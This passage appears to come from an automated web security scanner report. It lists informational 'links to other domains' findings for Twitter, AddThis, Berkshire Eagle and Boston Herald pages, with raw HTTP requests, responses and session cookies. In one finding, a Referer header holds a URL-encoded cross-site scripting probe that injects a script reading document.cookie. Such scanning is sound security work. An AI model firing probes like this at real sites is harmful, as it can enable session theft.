<a href="/TechCrunch" class="url" hreflang="en" rel="contact" title="TechCrunch"><img alt="TechCrunch" class="photo fn" height="24" src="http://a1.twimg.com/profile_images/115466107/techcrunch_bigger_mini.png" width="24" /></a>
...[SNIP]...
<a href="/messengerpost" class="url" hreflang="en" rel="contact" title="messengerpost"><img alt="messengerpost" class="photo fn" height="24" src="http://a2.twimg.com/profile_images/69345786/twitter_icon_mini.jpg" width="24" /></a>
...[SNIP]...
<a href="/Script_Junkie" class="url" hreflang="en" rel="contact" title="Script Junkie"><img alt="Script Junkie" class="photo fn" height="24" src="http://a0.twimg.com/profile_images/938927592/sjunk_trunc_mini.png" width="24" /></a>
...[SNIP]...
<a href="/stubbornella" class="url" hreflang="en" rel="contact" title="Nicole Sullivan"><img alt="Nicole Sullivan" class="photo fn" height="24" src="http://a1.twimg.com/profile_images/72157651/tattoo_pink_bkg_square_mini.jpg" width="24" /></a>
...[SNIP]...
<a href="/danwrong" class="url" hreflang="en" rel="contact" title="Dan Webb"><img alt="Dan Webb" class="photo fn" height="24" src="http://a1.twimg.com/profile_images/692828214/avatar_mini.jpg" width="24" /></a>
...[SNIP]...
<a href="/SlexAxton" class="url" hreflang="en" rel="contact" title="Alex Sexton"><img alt="Alex Sexton" class="photo fn" height="24" src="http://a2.twimg.com/profile_images/505590110/1ac219a6360a061d1ab2dbdc93435c96_mini.jpeg" width="24" /></a>
...[SNIP]...
<a href="/davevogler" class="url" hreflang="en" rel="contact" title="Dave Vogler"><img alt="Dave Vogler" class="photo fn" height="24" src="http://a1.twimg.com/profile_images/1147359486/dave-vogler-50_mini.jpg" width="24" /></a>
...[SNIP]...
<a href="/ExpertDan" class="url" hreflang="en" rel="contact" title="Dan DeFelippi"><img alt="Dan DeFelippi" class="photo fn" height="24" src="http://a1.twimg.com/profile_images/1171493203/headshot-11-20-10_mini.jpg" width="24" /></a>
...[SNIP]...
<a href="/dandenney" class="url" hreflang="en" rel="contact" title="Dan Denney"><img alt="Dan Denney" class="photo fn" height="24" src="http://a1.twimg.com/profile_images/1216037299/dan-social-avatar_mini.png" width="24" /></a>
...[SNIP]...
<a href="/androidnewsblog" class="url" hreflang="en" rel="contact" title="Google Android Blog"><img alt="Google Android Blog" class="photo fn" height="24" src="http://a0.twimg.com/profile_images/349012784/android_logo_small_mini.jpg" width="24" /></a>
...[SNIP]...
<a href="/cowboy" class="url" hreflang="en" rel="contact" title="Ben Alman"><img alt="Ben Alman" class="photo fn" height="24" src="http://a0.twimg.com/profile_images/860569124/headshot_kangol_200_mini.jpg" width="24" /></a>
...[SNIP]...
<a href="/Svantasukhai" class="url" hreflang="en" rel="contact" title="Vivek Dube"><img alt="Vivek Dube" class="photo fn" height="24" src="http://a1.twimg.com/a/1294957282/images/default_profile_2_mini.png" width="24" /></a>
...[SNIP]...
<a href="/ajpiano" class="url" hreflang="en" rel="contact" title="adam j.sontag"><img alt="adam j.sontag" class="photo fn" height="24" src="http://a0.twimg.com/profile_images/530311059/twitpic_mini.jpg" width="24" /></a>
...[SNIP]...
<a href="/mennovanslooten" class="url" hreflang="en" rel="contact" title="Menno van Slooten"><img alt="Menno van Slooten" class="photo fn" height="24" src="http://a1.twimg.com/profile_images/1121468480/headshot_mini.jpg" width="24" /></a>
...[SNIP]...
<a href="/rwaldron" class="url" hreflang="en" rel="contact" title="rick waldron"><img alt="rick waldron" class="photo fn" height="24" src="http://a2.twimg.com/profile_images/732025391/rick_jedi_avatar_mini.jpg" width="24" /></a>
...[SNIP]...
<a href="/dougneiner" class="url" hreflang="en" rel="contact" title="Douglas Neiner"><img alt="Douglas Neiner" class="photo fn" height="24" src="http://a0.twimg.com/profile_images/1219117972/doug-html5-2_mini.jpg" width="24" /></a>
...[SNIP]...
<a href="/RobertDuffy" class="url" hreflang="en" rel="contact" title="RobertDuffy"><img alt="RobertDuffy" class="photo fn" height="24" src="http://a1.twimg.com/profile_images/39840022/n647511610_73231_8183_mini.jpg" width="24" /></a>
...[SNIP]...
<a href="/gercheq" class="url" hreflang="en" rel="contact" title="Gercek Karakus"><img alt="Gercek Karakus" class="photo fn" height="24" src="http://a2.twimg.com/profile_images/692950475/gercekkarakus_mini.png" width="24" /></a>
...[SNIP]...
<a href="/sentience" class="url" hreflang="en" rel="contact" title="Kevin Yank"><img alt="Kevin Yank" class="photo fn" height="24" src="http://a0.twimg.com/profile_images/275486302/avatar_highres_mini.jpg" width="24" /></a>
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/twitter.js?1296181726" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181726" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181726" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181726" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/geov1.js?1296181726" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/api.js?1296181726" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181726" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/dismissable.js?1296181726" type="text/javascript"></script>
...[SNIP]...

17.257. http://twitter.com/search previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/search

Issue detail

The page was loaded from a URL containing a query string:

http://twitter.com/search?q=%23title

The response contains the following links to other domains:

http://a0.twimg.com/a/1296179758/images/fronts/logo_withbird_home.png
http://a0.twimg.com/a/1296179758/images/whatsnew/video-sample-ss.png
http://a1.twimg.com/a/1296179758/images/favicon.ico
http://a1.twimg.com/a/1296179758/images/twitter_57.png
http://a2.twimg.com/a/1296179758/javascripts/fronts.js
http://a2.twimg.com/a/1296179758/javascripts/widgets/widget.js?1296181158
http://a3.twimg.com/a/1296179758/stylesheets/fronts.css?1296181158
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js

Request

GET /search?q=%23title HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:30:17 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225017-82712-33749
ETag: "56fbb024580d3bfb801552c2807fc51e"
Last-Modified: Fri, 28 Jan 2011 14:30:17 GMT
X-Runtime: 0.04756
Content-Type: text/html; charset=utf-8
Content-Length: 19699
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CToMY3NyZl9pZCIlYzRjZDAxNGNhYmFhOTdiZTJjOTQ1NWFlYmVmMzAx%250AMjY6D2NyZWF0ZWRfYXRsKwgzTvDMLQE6B2lkIiUxYzk1MzQ4MWE0MmZkZTlj%250AMGM3NGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6%250ARmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7AA%253D%253D--469745f10cc0efe32cbf583a12fbdffc0da514e2; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=8">
<meta http-equiv="Content-Type" content="text/html; ch
...[SNIP]...
</title>
<link href="http://a1.twimg.com/a/1296179758/images/twitter_57.png" rel="apple-touch-icon" />
<link href="/oexchange.xrd" rel="http://oexchange.org/spec/0.8/rel/related-target" type="application/xrd+xml" />
<link href="http://a1.twimg.com/a/1296179758/images/favicon.ico" rel="shortcut icon" type="image/x-icon" />
<link href="http://a3.twimg.com/a/1296179758/stylesheets/fronts.css?1296181158" media="screen" rel="stylesheet" type="text/css" />

</head>
...[SNIP]...
<a href="/" id="logo"><img alt="Twitter" height="55" src="http://a0.twimg.com/a/1296179758/images/fronts/logo_withbird_home.png" width="224" /></a>
...[SNIP]...
<a href="/newtwitter?autoplay=true" id="video-thumb"><img alt="Video-sample-ss" height="140" src="http://a0.twimg.com/a/1296179758/images/whatsnew/video-sample-ss.png" width="200" /></a>
...[SNIP]...
</h2>

<script src="http://a2.twimg.com/a/1296179758/javascripts/widgets/widget.js?1296181158" type="text/javascript"></script>
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/fronts.js" type="text/javascript"></script>
...[SNIP]...

17.258. http://twitter.com/search previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/search

Issue detail

The page was loaded from a URL containing a query string:

http://twitter.com/search?q=%23title

The response contains the following links to other domains:

http://a0.twimg.com/a/1296179758/images/fronts/logo_withbird_home.png
http://a0.twimg.com/a/1296179758/images/whatsnew/video-sample-ss.png
http://a1.twimg.com/a/1296179758/images/favicon.ico
http://a1.twimg.com/a/1296179758/images/twitter_57.png
http://a1.twimg.com/a/1296179758/javascripts/widgets/widget.js?1296182903
http://a2.twimg.com/a/1296179758/javascripts/fronts.js
http://a2.twimg.com/a/1296179758/stylesheets/fronts.css?1296182903
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js

Request

GET /search?q=%23title HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:32:27 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225146-55911-59297
ETag: "1a4cc07300745eb2972aaf518a8d8062"
Last-Modified: Fri, 28 Jan 2011 14:32:26 GMT
X-Runtime: 0.05842
Content-Type: text/html; charset=utf-8
Content-Length: 20127
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CToMY3NyZl9pZCIlYjg4MDk4ZmY3YmE3Mjg1ODM0MWE4ZDEzNzMzMDMy%250AYzY6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--bcf319166b5d80f4aec8cb7e040774d7829464e0; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=8">
<meta http-equiv="Content-Type" content="text/html; ch
...[SNIP]...
</title>
<link href="http://a1.twimg.com/a/1296179758/images/twitter_57.png" rel="apple-touch-icon" />
<link href="/oexchange.xrd" rel="http://oexchange.org/spec/0.8/rel/related-target" type="application/xrd+xml" />
<link href="http://a1.twimg.com/a/1296179758/images/favicon.ico" rel="shortcut icon" type="image/x-icon" />
<link href="http://a2.twimg.com/a/1296179758/stylesheets/fronts.css?1296182903" media="screen" rel="stylesheet" type="text/css" />

</head>
...[SNIP]...
<a href="/" id="logo"><img alt="Twitter" height="55" src="http://a0.twimg.com/a/1296179758/images/fronts/logo_withbird_home.png" width="224" /></a>
...[SNIP]...
<a href="/newtwitter?autoplay=true" id="video-thumb"><img alt="Video-sample-ss" height="140" src="http://a0.twimg.com/a/1296179758/images/whatsnew/video-sample-ss.png" width="200" /></a>
...[SNIP]...
</h2>

<script src="http://a1.twimg.com/a/1296179758/javascripts/widgets/widget.js?1296182903" type="text/javascript"></script>
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/fronts.js" type="text/javascript"></script>
...[SNIP]...

17.259. http://twitter.com/search previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/search

Issue detail

The page was loaded from a URL containing a query string:

http://twitter.com/search?q=%23title

The response contains the following links to other domains:

http://a0.twimg.com/a/1296179758/images/fronts/logo_withbird_home.png
http://a0.twimg.com/a/1296179758/images/whatsnew/video-sample-ss.png
http://a0.twimg.com/a/1296179758/stylesheets/fronts.css?1296181726
http://a1.twimg.com/a/1296179758/images/favicon.ico
http://a1.twimg.com/a/1296179758/images/twitter_57.png
http://a2.twimg.com/a/1296179758/javascripts/fronts.js
http://a3.twimg.com/a/1296179758/javascripts/widgets/widget.js?1296181726
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js

Request

GET /search?q=%23title HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 17:10:21 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296234621-30105-56346
ETag: "61317f4bff6a487e772126d465b728cd"
Last-Modified: Fri, 28 Jan 2011 17:10:21 GMT
X-Runtime: 0.04128
Content-Type: text/html; charset=utf-8
Content-Length: 19717
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2E6D2NyZWF0ZWRfYXRsKwgzTvDMLQE6B2lkIiUxYzk1MzQ4MWE0MmZkZTlj%250AMGM3NGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6%250ARmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7AA%253D%253D--e41b589258f43ce00a3c10f5af818420400a35c0; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=8">
<meta http-equiv="Content-Type" content="text/html; ch
...[SNIP]...
</title>
<link href="http://a1.twimg.com/a/1296179758/images/twitter_57.png" rel="apple-touch-icon" />
<link href="/oexchange.xrd" rel="http://oexchange.org/spec/0.8/rel/related-target" type="application/xrd+xml" />
<link href="http://a1.twimg.com/a/1296179758/images/favicon.ico" rel="shortcut icon" type="image/x-icon" />
<link href="http://a0.twimg.com/a/1296179758/stylesheets/fronts.css?1296181726" media="screen" rel="stylesheet" type="text/css" />

</head>
...[SNIP]...
<a href="/" id="logo"><img alt="Twitter" height="55" src="http://a0.twimg.com/a/1296179758/images/fronts/logo_withbird_home.png" width="224" /></a>
...[SNIP]...
<a href="/newtwitter?autoplay=true" id="video-thumb"><img alt="Video-sample-ss" height="140" src="http://a0.twimg.com/a/1296179758/images/whatsnew/video-sample-ss.png" width="200" /></a>
...[SNIP]...
</h2>

<script src="http://a3.twimg.com/a/1296179758/javascripts/widgets/widget.js?1296181726" type="text/javascript"></script>
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/fronts.js" type="text/javascript"></script>
...[SNIP]...

17.260. http://twitter.com/share previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/share

Issue detail

The page was loaded from a URL containing a query string:

http://twitter.com/share?url=

The response contains the following links to other domains:

http://s.twimg.com/images/favicon.ico
http://yui.yahooapis.com/3.1.1/build/cssfonts/fonts-min.css

Request

GET /share?url= HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 403 Forbidden
Date: Sat, 29 Jan 2011 01:52:51 GMT
Server: hi
Status: 403 Forbidden
X-Transaction: 1296265971-23870-30415
Last-Modified: Sat, 29 Jan 2011 01:52:51 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 4792
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html>

<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta http-equiv="Content-Language" content="en-us" />
<title>Twitter / Valid URL par
...[SNIP]...
</title>
<link href="http://s.twimg.com/images/favicon.ico" rel="shortcut icon" type="image/x-icon" />
<link rel="stylesheet" href="http://yui.yahooapis.com/3.1.1/build/cssfonts/fonts-min.css" type="text/css" charset="utf-8">

<style type="text/css" media="screen">
...[SNIP]...

17.261. http://www.addthis.com/bookmark.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.addthis.com
Path:	/bookmark.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.addthis.com/bookmark.php?v=20

The response contains the following links to other domains:

http://cache.addthiscdn.com/www/q0197/js/bookmark.js
http://cache.addthiscdn.com/www/q0197/style/bookmark.css

Request

GET /bookmark.php?v=20 HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:03:18 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/
Content-Length: 92624

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>AddThis Social Bookm
...[SNIP]...
<link rel="canonical" href="http://www.addthis.com/bookmark.php" />
<link href="//cache.addthiscdn.com/www/q0197/style/bookmark.css" rel="stylesheet" type="text/css" />
<style type="text/css" media="only screen and (device-width: 768px)" />
...[SNIP]...
</style>
<script type="text/javascript" src="//cache.addthiscdn.com/www/q0197/js/bookmark.js"></script>
...[SNIP]...

17.262. http://www.berkshireeagle.com/portlet/weather/html/process_mode.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.berkshireeagle.com
Path:	/portlet/weather/html/process_mode.jsp

Issue detail

The page was loaded from a URL containing a query string:

http://www.berkshireeagle.com/portlet/weather/html/process_mode.jsp?displayMode=weather_box_horizontal&zipcode=01201&siteUrl=www.berkshireeagle.com&weatherSection=/weather

The response contains the following link to another domain:

http://extras.mnginteractive.com/live/media/weather/icons/10.gif

Request

GET /portlet/weather/html/process_mode.jsp?displayMode=weather_box_horizontal&zipcode=01201&siteUrl=www.berkshireeagle.com&weatherSection=/weather HTTP/1.1
Host: www.berkshireeagle.com
Proxy-Connection: keep-alive
Referer: http://www.berkshireeagle.com/?f0ba9%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E7e6d2fe4b4=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=NCGACERYMBIXOCUUCAWCFEY; UserID=NCGACERYMBIXOCUUCAWCFEY; fPage=true; u=COOKIE_NAME%3Du%3BuserIdChange%3Dtrue%3BuserId%3DNCGACERYMBIXOCUUCAWCFEY%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dtrue%3BfVisit%3Dtrue%3BvType%3D1%3BlVisit%3D1296308397392%3BcVisit%3D1296308397392%3BinitRegType%3DVoluntary%3B; currBrandCheck=NeBer; UserType=Browser; s_cc=true; s_sq=%5B%5BB%5D%5D; __g_c=w%3A1%7Cb%3A2%7Cc%3A291148578685700%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; __g_u=291148578685700_1_0.01_0_5_1296740401855

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-ATG-Version: ATGPlatform/7.1p2 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Content-Type: text/html; charset=UTF-8
Vary: Accept-encoding
Expires: Sat, 29 Jan 2011 13:40:19 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 29 Jan 2011 13:40:19 GMT
Connection: close
Content-Length: 1335

<script>
   /* var to notify copyright notice in link_controller that it should display */
   MNGiCustomWeather = true;

   //Set the horizontal and vertical position
...[SNIP]...
<td align="center" width="10"><img src="http://extras.mnginteractive.com/live/media/weather/icons/10.gif" border="0" class="weatherIcon"/></td>
...[SNIP]...

17.263. http://www.bostonherald.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/

Issue detail

The page was loaded from a URL containing a query string:

http://www.bostonherald.com/?showResults=1#results

The response contains the following links to other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Fhomepage.bg%3FshowResults%3D1&c5=&c6=&c15=
http://bh.heraldinteractive.com/includes/processAds.bg?position=Middle&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome
http://bh.heraldinteractive.com/includes/processAds.bg?position=Top&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome
http://boston30.autochooser.com/results.asp?gid=0&pagename=dealersearch.asp&resulttype=2&postto=results.asp
http://bostonherald.boocoo.com/
http://bostonheraldnie.newspaperdirect.com/
http://cache.heraldinteractive.com/blogs/entertainment/disney_days/wp-content/uploads/2011/01/castaway11111.jpg
http://cache.heraldinteractive.com/blogs/news/city_desk_wired/wp-content/uploads/2011/01/roof-collapse-in-lynn.jpg
http://cache.heraldinteractive.com/blogs/news/mediaBiz/wp-content/uploads/2011/01/matty2.jpg
http://cache.heraldinteractive.com/blogs/sports/celtics/wp-content/uploads/2011/01/kobe.jpg
http://cache.heraldinteractive.com/blogs/sports/rap_sheet/wp-content/uploads/2011/01/2010112120101121395900.jpg
http://cache.heraldinteractive.com/blogs/sports/red_sox/wp-content/uploads/2011/01/a76f88_010611crawfordnl111.JPG
http://cache.heraldinteractive.com/images/siteImages/blogLogos/FORKLIFT_177x57.jpg
http://cache.heraldinteractive.com/images/siteImages/blogLogos/INSIDER_177x57.png
http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif
http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png
http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/facebook.png
http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/twitter.png
http://cache.heraldinteractive.com/images/siteImages/jobfind/homepageHotJobsSearch.gif
http://cache.heraldinteractive.com/images/siteImages/slider/sliderNewsBackOff.gif
http://cache.heraldinteractive.com/images/siteImages/slider/sliderNewsMoreOn.gif
http://cache.heraldinteractive.com/images/siteImages/slider/teases/college177.gif
http://cache.heraldinteractive.com/images/siteImages/slider/teases/enews177.gif
http://cache.heraldinteractive.com/images/siteImages/slider/teases/halfPriceBoston177.gif
http://cache.heraldinteractive.com/images/siteImages/slider/teases/homeDelivery177.gif
http://cache.heraldinteractive.com/images/siteImages/slider/teases/jobfind177.gif
http://cache.heraldinteractive.com/images/siteImages/slider/teases/policeBlotter177.gif
http://cache.heraldinteractive.com/images/siteImages/slider/teases/shopLocal177.gif
http://cache.heraldinteractive.com/images/siteImages/slider/teases/taxMoney177.gif
http://cache.heraldinteractive.com/images/siteImages/weather/02.gif
http://cache.heraldinteractive.com/images/siteImages/weather/03.gif
http://cache.heraldinteractive.com/images/siteImages/weather/19.gif
http://cache.heraldinteractive.com/images/siteImages/weather/35.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/homepage/sampleFrontPage120.jpg
http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments.gif
